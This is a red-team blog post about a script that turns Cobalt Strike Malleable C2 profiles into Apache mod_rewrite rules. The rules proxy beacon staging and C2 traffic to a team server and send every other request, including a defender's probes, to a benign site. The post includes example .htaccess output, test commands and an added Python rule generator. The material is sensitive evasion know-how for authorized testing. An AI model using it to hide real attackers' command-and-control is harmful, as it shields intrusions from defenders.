Automating Apache mod_rewrite and Cobalt Strike Malleable C2 for Intelligent Redirection

By Joe Vest | February 1, 2018 | Cobalt Strike, Red Teaming

This post describes a script I created to convert a Cobalt Strike Malleable C2 profile into the corresponding mod_rewrite rules, enabling intelligent HTTP proxying for redirection of C2 traffic. The script automates the process described by well-known red teamer and now co-worker Jeff Dimmock (@bluscreenofjeff). Intelligent use of C2 redirectors is core to a mature C2 architecture that can withstand some gentle investigation and prodding: requests that look like the beacon's own traffic are proxied to the team server, and everything else is sent somewhere benign. Developing Cobalt Strike compatible mod_rewrite rules is not incredibly difficult, but there are a few Apache “gotchas” and the process can be error prone when dealing with multiple C2 profiles. Automation improves consistency and reduces the time needed to spin up, test, and troubleshoot a unique and layered C2 infrastructure. It is always nice to start from a known good.

Highlights of cs2modrewrite.py

  • Rewrite Rules based on valid C2 URIs (HTTP GET, POST, and Stager) and specified User-Agent string. Result: Only requests to valid C2 URIs with a specified UA string will be proxied to the Team Server by default.
  • Uses a custom Malleable C2 profile to build a .htaccess file with corresponding mod_rewrite rules
  • Supports the most recent Cobalt Strike 3.10 profile features
  • HTTP or HTTPS proxying to the Cobalt Strike Team Server
  • HTTP 302 Redirection to a Legitimate Site for Non-Matching Requests

Quick Start

  • Run Cobalt Strike’s c2lint profile validation tool to ensure your chosen C2 profile is functional.
    ./c2lint havex.profile
  • Run cs2modrewrite.py against the C2 profile.
    python ./cs2modrewrite.py -i havex.profile -c http://<myc2domain.com> -d http://<totallylegitsite.com>
  • Save the output to the web root directory (/var/www/html/.htaccess)
  • Modify/tweak the .htaccess file as needed.
  • Ensure your Apache installation will honor the new .htaccess file.
    • Enable the necessary Apache modules for redirection support. If the rules will proxy to an HTTPS team server (as in the example output below), also enable mod_ssl (a2enmod ssl) and set SSLProxyEngine On in the redirector’s virtual host; that directive is not accepted in .htaccess.
      a2enmod rewrite proxy proxy_http
    • Modify the directory block in /etc/apache2/apache2.conf to resemble the following. The key here is to ensure AllowOverride is set to “All” rather than “None”; with “None” the .htaccess file is never read. Indexes is not needed for a redirector and turns on directory listing for the web root, so it can be dropped.
      <Directory /var/www/html/>
       Options Indexes FollowSymLinks
       AllowOverride All
       Require all granted
      </Directory>
    • Restart your Apache instance after enabling new modules and changing the config. Subsequent .htaccess file changes should not require a restart or reload.
      service apache2 restart
  • Test, test, test…
    • Perform some quick initial testing and verification of your mod_rewrite rules with the curl command before attempting to generate and execute any beacons. Send the User-Agent exactly as it appears in the profile: the RewriteCond match is case-sensitive and the generated rules carry no [NC] flag.
      # This command should match the mod_rewrite stager rules and result in proxying of the beacon payload:
      # expect a 200 from the team server (the body is discarded here; -D - shows the response headers)
      $ curl -s -D - -o /dev/null -H "User-Agent: My Custom UA" http://redirector.com/<stageruri>
      
      # This command should fall through to the catch-all and redirect to your chosen benign site:
      # expect a 302 with a Location header pointing at that site
      $ curl -s -D - -o /dev/null -H "User-Agent: Blue Forces UA" http://redirector.com/<stageruri>

Usage

The script can be found at: https://github.com/threatexpress/cs2modrewrite

Arguments

cs2modrewrite.py [-h] [-i INPUTFILE] [-c C2SERVER] [-d DESTINATION]

Converts Cobalt Strike profiles to Apache mod_rewrite .htaccess file format by
using the User-Agent and URI Endpoint to create rewrite rules. Make sure the
profile passes a c2lint check before running this script.

optional arguments:
  -h, --help      show this help message and exit
  -i INPUTFILE    C2 Profile file
  -c C2SERVER     C2 Server (http://teamserver)
  -d DESTINATION  (Optional) Redirect to this URL (http://google.com)

Example Output

#### Save the following as .htaccess in the root web directory

########################################
## .htaccess START 
RewriteEngine On

## (Optional)
## Scripted Web Delivery 
## Uncomment and adjust as needed
#RewriteCond %{REQUEST_URI} ^/css/style1.css?$
#RewriteCond %{HTTP_USER_AGENT} ^$
#RewriteRule ^.*$ "http://TEAMSERVER%{REQUEST_URI}" [P,L]

## Default Beacon Staging Support (/1234)
RewriteCond %{REQUEST_URI} ^/..../?$
RewriteCond %{HTTP_USER_AGENT} "Mozilla/5.0 \(Windows; U; MSIE 7.0; Windows NT 5.2\) Java/1.5.0_08"
RewriteRule ^.*$ "http://TEAMSERVER%{REQUEST_URI}" [P,L]

## C2 Traffic (HTTP-GET, HTTP-POST, HTTP-STAGER URIs)
## Logic: If a requested URI AND the User-Agent matches, proxy the connection to the Teamserver
## Consider adding other HTTP checks to fine tune the check.  (HTTP Cookie, HTTP Referer, HTTP Query String, etc)
## Refer to http://httpd.apache.org/docs/current/mod/mod_rewrite.html
## Profile URIs
RewriteCond %{REQUEST_URI} ^(/include/template/isx.php.*|/wp06/wp-includes/po.php.*|/wp08/wp-includes/dtcla.php.*|/modules/mod_search.php.*|/blog/wp-includes/pomo/src.php.*|/includes/phpmailer/class.pop3.php.*|/api/516280565958.*|/api/516280565959.*)$
## Profile UserAgent
RewriteCond %{HTTP_USER_AGENT} "Mozilla/5.0 \(Windows; U; MSIE 7.0; Windows NT 5.2\) Java/1.5.0_08"
RewriteRule ^.*$ "https://TEAMSERVER%{REQUEST_URI}" [P,L]

## Redirect all other traffic here
RewriteRule ^.*$ HTTPS://GOHERE/? [L,R=302]

## .htaccess END
########################################

What does this .htaccess do?

Staging: When Apache receives an HTTP request with the User-Agent Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 5.2) Java/1.5.0_08 and a 4 character URI (optionally followed by a trailing slash), it proxies the request to the team server.

C2 Traffic: When Apache receives an HTTP request with the User-Agent Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 5.2) Java/1.5.0_08 and a URI beginning with one of the following (/include/template/isx.php, /wp06/wp-includes/po.php, /wp08/wp-includes/dtcla.php, /modules/mod_search.php, /blog/wp-includes/pomo/src.php, /includes/phpmailer/class.pop3.php, /api/516280565958, /api/516280565959), it proxies the request to the team server. Both conditions must hold: consecutive RewriteCond lines are ANDed, and the User-Agent comparison is case-sensitive.

Catch All: Any request that does not match one of the rules above is redirected to the chosen benign site with an HTTP 302; the trailing ? in that rule drops the original query string from the redirect.
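The following Python is an added example of my own, not the cs2modrewrite script's code. It builds the same three-stage rule set (default stager URIs, profile URIs, catch-all 302) from a constructed Malleable C2 profile fragment, and then evaluates sample requests against the emitted rules offline in the way the explanation above reads them: the RewriteCond pairs are ANDed, the User-Agent match is case-sensitive, and the first rule that fires wins because of [L]. The profile text, the TEAMSERVER/GOHERE placeholders and the sample requests are constructed for the example; the function names are mine.

```python
import re

# Constructed Malleable C2 profile fragment (illustration only, not a real
# profile); the URIs mirror the example .htaccess above.
SAMPLE_PROFILE = r'''
set useragent "Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 5.2) Java/1.5.0_08";
http-get {
    set uri "/include/template/isx.php /wp06/wp-includes/po.php";
    client { metadata { base64; header "Cookie"; } }
    server { output { print; } }
}
http-post {
    set uri "/api/516280565958";
    client { id { parameter "id"; } output { print; } }
}
http-stager {
    set uri_x86 "/modules/mod_search.php";
    set uri_x64 "/includes/phpmailer/class.pop3.php";
}
'''

PCRE_SPECIALS = set('.^$*+?()[]{}|\\')


def apache_regex_escape(text):
    """Backslash-escape regex metacharacters so a literal User-Agent or URI can
    be used as a RewriteCond pattern (the page's output escapes only the
    parentheses, which happens to be enough for that UA)."""
    return ''.join('\\' + c if c in PCRE_SPECIALS else c for c in text)


def extract_blocks(profile, name):
    """Body of every top-level `name { ... }` block; braces are counted so the
    nested client/server/metadata blocks do not end the match early."""
    bodies = []
    for m in re.finditer(r'\b' + re.escape(name) + r'\b[^{]*\{', profile):
        depth, i = 1, m.end()
        while i < len(profile) and depth:
            depth += {'{': 1, '}': -1}.get(profile[i], 0)
            i += 1
        bodies.append(profile[m.end():i - 1])
    return bodies


def parse_profile(profile):
    """Return (useragent, uris) with every http-get, http-post and http-stager
    URI; a single `set uri` may list several, separated by spaces."""
    m = re.search(r'set\s+useragent\s+"([^"]*)"', profile)
    if not m:
        raise ValueError('profile has no "set useragent"; run c2lint first')
    uris = []
    for block in ('http-get', 'http-post', 'http-stager'):
        for body in extract_blocks(profile, block):
            for value in re.findall(r'set\s+uri(?:_x86|_x64)?\s+"([^"]*)"', body):
                uris.extend(value.split())
    return m.group(1), uris


def build_htaccess(ua, uris, teamserver, redirect):
    """Emit the rule set of the example output: 4-character stager URIs + UA
    -> proxy, profile URIs + UA -> proxy, everything else -> 302."""
    ua_re = apache_regex_escape(ua)
    uri_re = '^(' + '|'.join(apache_regex_escape(u) + '.*' for u in uris) + ')$'
    return '\n'.join([
        'RewriteEngine On',
        '## Default beacon staging (4-character URIs)',
        'RewriteCond %{REQUEST_URI} ^/..../?$',
        f'RewriteCond %{{HTTP_USER_AGENT}} "{ua_re}"',
        f'RewriteRule ^.*$ "{teamserver}%{{REQUEST_URI}}" [P,L]',
        '## Profile URIs (http-get, http-post, http-stager)',
        f'RewriteCond %{{REQUEST_URI}} {uri_re}',
        f'RewriteCond %{{HTTP_USER_AGENT}} "{ua_re}"',
        f'RewriteRule ^.*$ "{teamserver}%{{REQUEST_URI}}" [P,L]',
        '## Everything else',
        f'RewriteRule ^.*$ {redirect}/? [L,R=302]',
    ]) + '\n'


def evaluate(htaccess, path, req_ua):
    """Walk the emitted rules as mod_rewrite does for one request: every
    RewriteCond directly above a RewriteRule must match (patterns are
    searched, so only those written with ^...$ are anchored, and the match is
    case-sensitive without [NC]); the first rule whose conditions pass wins
    because of [L]. Returns (action, substituted target) or None."""
    subjects = {'%{REQUEST_URI}': path, '%{HTTP_USER_AGENT}': req_ua}
    conds = []
    for line in htaccess.splitlines():
        if line.startswith('RewriteCond'):
            _, var, pattern = line.split(None, 2)
            conds.append((var, pattern.strip('"')))
        elif line.startswith('RewriteRule'):
            _, pattern, target, flags = line.split(None, 3)
            # per-directory context: the rule pattern sees the path without
            # its leading slash (^.*$ matches either way)
            if all(re.search(p, subjects[v]) for v, p in conds) and \
                    re.search(pattern, path.lstrip('/')):
                action = 'proxy' if 'P' in flags.strip('[]').split(',') else 'redirect'
                return action, target.strip('"').replace('%{REQUEST_URI}', path)
            conds = []  # a rule that did not fire discards its conditions
    return None


if __name__ == '__main__':
    ua, uris = parse_profile(SAMPLE_PROFILE)
    rules = build_htaccess(ua, uris, 'https://TEAMSERVER', 'https://GOHERE')
    print(rules)
    for path, agent in [('/ab12', ua), ('/api/516280565958', 'curl/7.58.0'), ('/', ua)]:
        print(path, agent[:20], '->', evaluate(rules, path, agent))
```

Running it prints the generated block and the decision for each sample request. The User-Agent pattern is built with a full metacharacter escape rather than only the parentheses; whichever generator you use, diff the emitted RewriteCond against the profile's useragent before deploying, since an unescaped + or ? silently changes what gets proxied. The emulation handles only the directives the generator emits, so treat it as a sanity check of rule order and escaping, not a replacement for the curl tests above against the live redirector.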

Summary

TLDR; The python script cs2modrewrite.py automates the process of creating a Malleable C2 compatible .htaccess file for intelligent redirection with Apache mod_rewrite. Try it out and feel free to give feedback and suggestions at @joevest on Twitter and on the ThreatExpress GitHub repo.

For more details on developing C2 architecture, check out the Red Team Infrastructure Wiki.


About Joe Vest

Joe Vest has worked in the information technology industry for over 17 years with a focus on red teaming, penetration testing and application security. Joe is an author of the SANS Red Team Operations and Threat Emulation course (SEC-564). As a former technical lead for a DoD red team, he has extensive knowledge of cyber threats and their tools, tactics and techniques, including threat emulation and threat detection. Joe is the co-founder of the security consulting company MINIS LLC (Merged with SpecterOps in 2017). As a leading security professional, he has achieved numerous security certifications: OSCP, CISSP-ISSMP, CISA, GPEN, GCIH, GWAPT, CEH, Security+